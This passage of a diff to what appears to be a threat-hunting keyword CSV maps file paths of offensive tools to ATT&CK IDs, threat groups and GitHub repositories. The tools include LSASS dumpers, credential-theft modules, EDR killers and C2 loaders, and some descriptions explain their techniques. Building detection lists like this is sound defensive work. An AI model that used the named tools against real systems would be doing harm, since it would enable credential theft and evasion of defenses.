- T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EncodeGroup/BOF-RegSave","1","1","N/A","10","10","171","29","2020-10-08T17:29:02Z","2020-10-07T13:46:03Z" "*\TakeMyRDP*","offensive_tool_keyword","TakeMyRDP","A keystroke logger targeting the Remote Desktop Protocol (RDP) related processes","T1056.001 - T1021.001 - T1057","TA0002 - TA0003 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/TheD1rkMtr/TakeMyRDP","1","1","N/A","N/A","3","278","56","2023-08-02T02:23:28Z","2023-07-02T17:25:33Z" "*\TASKSHELL.EXE*","offensive_tool_keyword","cobaltstrike","tamper scheduled task with a binary","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RiccardoAncarani/TaskShell","1","0","N/A","10","10","54","8","2021-02-15T19:23:13Z","2021-02-15T19:22:26Z" +"*\teams_localdb.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" "*\teamserver-win.zip*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","0","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" -"*\teamstracker.py*","offensive_tool_keyword","teamstracker","using graph proxy to monitor teams user presence","T1552.007 - T1052.001 - T1602","TA0003 - TA0005 - TA0007","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/teamstracker","1","0","N/A","3","1","46","3","2023-08-25T15:07:14Z","2023-08-15T03:41:46Z" -"*\temp\dump.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" -"*\Temp\dumpert*","offensive_tool_keyword","Dumpert","Dumpert. an LSASS memory dumper using direct system calls and API unhooking Recent malware research shows that there is an increase in malware that is using direct system calls to evade user-mode API hooks used by security products. This tool demonstrates the use of direct System Calls and API unhooking and combine these techniques in a proof of concept code which can be used to create a LSASS memory dump using Cobalt Strike. while not touching disk and evading AV/EDR monitored user-mode API calls.","T1003 - T1055 - T1083 - T1059 - T1204","TA0003 - TA0005 - TA0002","N/A","N/A","Credential Access","https://github.com/outflanknl/Dumpert","1","0","N/A","N/A","10","1312","237","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z" +"*\teamstracker.py*","offensive_tool_keyword","teamstracker","using graph proxy to monitor teams user presence","T1552.007 - T1052.001 - T1602","TA0003 - TA0005 - TA0007","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/teamstracker","1","0","N/A","3","1","47","3","2023-08-25T15:07:14Z","2023-08-15T03:41:46Z" +"*\temp\dump.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*\Temp\dumpert*","offensive_tool_keyword","Dumpert","Dumpert. an LSASS memory dumper using direct system calls and API unhooking Recent malware research shows that there is an increase in malware that is using direct system calls to evade user-mode API hooks used by security products. This tool demonstrates the use of direct System Calls and API unhooking and combine these techniques in a proof of concept code which can be used to create a LSASS memory dump using Cobalt Strike. while not touching disk and evading AV/EDR monitored user-mode API calls.","T1003 - T1055 - T1083 - T1059 - T1204","TA0003 - TA0005 - TA0002","N/A","N/A","Credential Access","https://github.com/outflanknl/Dumpert","1","0","N/A","N/A","10","1314","237","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z" "*\temp\hollow.dll*","offensive_tool_keyword","SQLRecon","A C# MS SQL toolkit designed for offensive reconnaissance and post-exploitation","T1003.003 - T1049 - T1059.005 - T1078.003","TA0005 - TA0006 - TA0002 - TA0004","N/A","N/A","Network Exploitation Tools","https://github.com/skahwah/SQLRecon","1","0","N/A","N/A","6","502","97","2023-08-10T00:42:31Z","2021-11-19T15:58:49Z" -"*\temp\pwned.trx*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" -"*\Temp\Reaper.exe*","offensive_tool_keyword","reaper","Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.","T1547.009 - T1215 - T1129 - T1548.002","TA0002 - TA0003 - TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/MrEmpy/Reaper","1","0","N/A","10","1","61","18","2023-09-22T22:08:12Z","2023-09-21T02:09:48Z" -"*\Temp\RTCore64.sys*","offensive_tool_keyword","PPLKiller","Tool to bypass LSA Protection (aka Protected Process Light)","T1547.002 - T1558.003","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/RedCursorSecurityConsulting/PPLKiller","1","0","N/A","10","8","744","127","2022-12-04T23:38:31Z","2020-07-06T10:11:49Z" -"*\Temp\whoami.txt*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","525","54","2023-10-03T21:19:24Z","2023-09-08T15:36:00Z" +"*\temp\pwned.trx*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*\Temp\Reaper.exe*","offensive_tool_keyword","reaper","Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.","T1547.009 - T1215 - T1129 - T1548.002","TA0002 - TA0003 - TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/MrEmpy/Reaper","1","0","N/A","10","1","62","19","2023-09-22T22:08:12Z","2023-09-21T02:09:48Z" +"*\Temp\RTCore64.sys*","offensive_tool_keyword","PPLKiller","Tool to bypass LSA Protection (aka Protected Process Light)","T1547.002 - T1558.003","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/RedCursorSecurityConsulting/PPLKiller","1","0","N/A","10","8","745","127","2022-12-04T23:38:31Z","2020-07-06T10:11:49Z" +"*\Temp\whoami.txt*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" "*\tests\beacon64.bin*","offensive_tool_keyword","C2 related tools","Thread Stack Spoofing - PoC for an advanced In-Memory evasion technique allowing to better hide injected shellcode's memory allocation from scanners and analysts.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/mgeeky/ThreadStackSpoofer","1","0","N/A","10","10","875","158","2022-06-17T18:06:35Z","2021-09-26T22:48:17Z" "*\TGSThief\*","offensive_tool_keyword","TGSThief","get the TGS of a user whose logon session is just present on the computer","T1558 - T1558.003 - T1078 - T1078.005","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/MzHmO/TGSThief","1","0","N/A","9","2","129","18","2023-07-25T05:30:39Z","2023-07-23T07:47:05Z" -"*\the-backdoor-factory\*","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/secretsquirrel/the-backdoor-factory","1","0","N/A","10","10","3185","809","2023-08-14T02:52:06Z","2013-05-30T01:04:24Z" -"*\ThemeBleed.exe *","offensive_tool_keyword","themebleed","Proof-of-Concept for CVE-2023-38146","T1566.001 - T1077 - T1213.002","TA0007 - TA0011 - TA0010","N/A","N/A","Exploitation tools","https://github.com/gabe-k/themebleed","1","0","N/A","10","2","143","27","2023-09-13T04:50:29Z","2023-09-13T04:00:14Z" -"*\ThemeBleed.sln*","offensive_tool_keyword","themebleed","Proof-of-Concept for CVE-2023-38146","T1566.001 - T1077 - T1213.002","TA0007 - TA0011 - TA0010","N/A","N/A","Exploitation tools","https://github.com/gabe-k/themebleed","1","0","N/A","10","2","143","27","2023-09-13T04:50:29Z","2023-09-13T04:00:14Z" -"*\TheThing.exe*","offensive_tool_keyword","SwampThing","SwampThing lets you to spoof process command line args (x32/64). Essentially you create a process in a suspended state - rewrite the PEB - resume and finally revert the PEB. The end result is that logging infrastructure will record the fake command line args instead of the real ones","T1036.005 - T1564.002","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/SwampThing","1","0","N/A","N/A","10","1069","209","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z" +"*\the-backdoor-factory\*","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/secretsquirrel/the-backdoor-factory","1","0","N/A","10","10","3186","809","2023-08-14T02:52:06Z","2013-05-30T01:04:24Z" +"*\ThemeBleed.exe *","offensive_tool_keyword","themebleed","Proof-of-Concept for CVE-2023-38146","T1566.001 - T1077 - T1213.002","TA0007 - TA0011 - TA0010","N/A","N/A","Exploitation tools","https://github.com/gabe-k/themebleed","1","0","N/A","10","2","143","28","2023-09-13T04:50:29Z","2023-09-13T04:00:14Z" +"*\ThemeBleed.sln*","offensive_tool_keyword","themebleed","Proof-of-Concept for CVE-2023-38146","T1566.001 - T1077 - T1213.002","TA0007 - TA0011 - TA0010","N/A","N/A","Exploitation tools","https://github.com/gabe-k/themebleed","1","0","N/A","10","2","143","28","2023-09-13T04:50:29Z","2023-09-13T04:00:14Z" +"*\TheThing.exe*","offensive_tool_keyword","SwampThing","SwampThing lets you to spoof process command line args (x32/64). Essentially you create a process in a suspended state - rewrite the PEB - resume and finally revert the PEB. The end result is that logging infrastructure will record the fake command line args instead of the real ones","T1036.005 - T1564.002","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/SwampThing","1","0","N/A","N/A","10","1070","209","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z" "*\TikiCompiler.txt*","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rasta-mouse/TikiTorch","1","0","N/A","10","10","741","147","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z" "*\TikiService.exe*","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rasta-mouse/TikiTorch","1","0","N/A","10","10","741","147","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z" "*\TikiSpawn.*","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rasta-mouse/TikiTorch","1","0","N/A","10","10","741","147","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z" @@ -6476,7 +6610,8 @@ "*\Tor\torrc*","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Network Exploitation tools","https://github.com/vectra-ai-research/MAAD-AF","1","0","N/A","N/A","3","293","43","2023-09-27T02:49:59Z","2023-02-09T02:08:07Z" "*\TorBrowser*","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Network Exploitation tools","https://github.com/vectra-ai-research/MAAD-AF","1","0","N/A","N/A","3","293","43","2023-09-27T02:49:59Z","2023-02-09T02:08:07Z" "*\TrustExec.exe*","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","0","N/A","10","6","575","94","2023-10-02T03:31:07Z","2021-12-28T13:14:25Z" -"*\UACME-*.zip*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*\uac.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*\UACME-*.zip*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" "*\uberfile.py*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*\unDefender.exe*","offensive_tool_keyword","unDefender","Killing your preferred antimalware by abusing native symbolic links and NT paths.","T1562.001 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/APTortellini/unDefender","1","0","N/A","10","4","309","78","2022-01-29T12:35:31Z","2021-08-21T14:45:39Z" "*\unquotedsvcpath.o*","offensive_tool_keyword","PrivKit","PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.","T1548.002 - T1059.003 - T1027.002","TA0005","N/A","N/A","Privilege Escalation","https://github.com/mertdas/PrivKit","1","0","N/A","9","3","265","35","2023-03-23T09:50:09Z","2023-03-20T04:19:40Z" @@ -6485,8 +6620,9 @@ "*\users\public\sam.save*","offensive_tool_keyword","undertheradar","scripts that afford the pentester AV bypass techniques","T1055.005 - T1027 - T1116 - T1070.004","TA0040 - TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/g3tsyst3m/undertheradar","1","0","N/A","9","1","7","0","2023-08-10T00:30:20Z","2023-07-01T17:59:20Z" "*\users\public\system.save*","offensive_tool_keyword","undertheradar","scripts that afford the pentester AV bypass techniques","T1055.005 - T1027 - T1116 - T1070.004","TA0040 - TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/g3tsyst3m/undertheradar","1","0","N/A","9","1","7","0","2023-08-10T00:30:20Z","2023-07-01T17:59:20Z" "*\Users\Public\termsrv.dll*","offensive_tool_keyword","SharpDoor","SharpDoor is alternative RDPWrap written in C# to allowed multiple RDP (Remote Desktop) sessions by patching termsrv.dll file.","T1076 - T1059 - T1085 - T1070.004","TA0008 - TA0002 - TA0009","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/SharpDoor","1","0","N/A","7","3","298","64","2019-09-30T16:11:24Z","2019-09-29T02:24:07Z" -"*\Users_Nochangedpassword.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*\Users_Nochangedpassword.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" "*\UUID_bypass.py*","offensive_tool_keyword","FourEye","AV Evasion Tool","T1059 - T1059.001 - T1059.005 - T1027 - T1027.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/lengjibo/FourEye","1","0","N/A","10","8","724","154","2021-12-08T11:55:15Z","2020-12-11T01:29:58Z" +"*\veeam_dump.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" "*\wce32.exe*","offensive_tool_keyword","wce","Windows Credentials Editor","T1003.002 - T1003.003 - T1558.001 - T1558.003 - T1110 - T1055.001","TA0006 - TA0005 - TA0002","N/A","N/A","Credential Access","https://www.kali.org/tools/wce/","1","0","N/A","8","4","N/A","N/A","N/A","N/A" "*\wce64.exe*","offensive_tool_keyword","wce","Windows Credentials Editor","T1003.002 - T1003.003 - T1558.001 - T1558.003 - T1110 - T1055.001","TA0006 - TA0005 - TA0002","N/A","N/A","Credential Access","https://www.kali.org/tools/wce/","1","0","N/A","8","4","N/A","N/A","N/A","N/A" "*\wce-beta.zip*","offensive_tool_keyword","wce","Windows Credentials Editor","T1003.002 - T1003.003 - T1558.001 - T1558.003 - T1110 - T1055.001","TA0006 - TA0005 - TA0002","N/A","N/A","Credential Access","https://www.kali.org/tools/wce/","1","1","N/A","8","4","N/A","N/A","N/A","N/A" @@ -6495,43 +6631,50 @@ "*\wdextract.vcxproj*","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","347","56","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" "*\wdextract32.exe*","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","347","56","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" "*\wdextract64.exe*","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","347","56","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" -"*\WdigestOffsets.csv*","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","0","N/A","10","2","180","34","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" +"*\wdigest.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*\WdigestOffsets.csv*","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","0","N/A","10","2","183","35","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" +"*\web_delivery.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*\webdav.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" "*\WfpTokenDup.exe*","offensive_tool_keyword","PrivFu","Kernel mode WinDbg 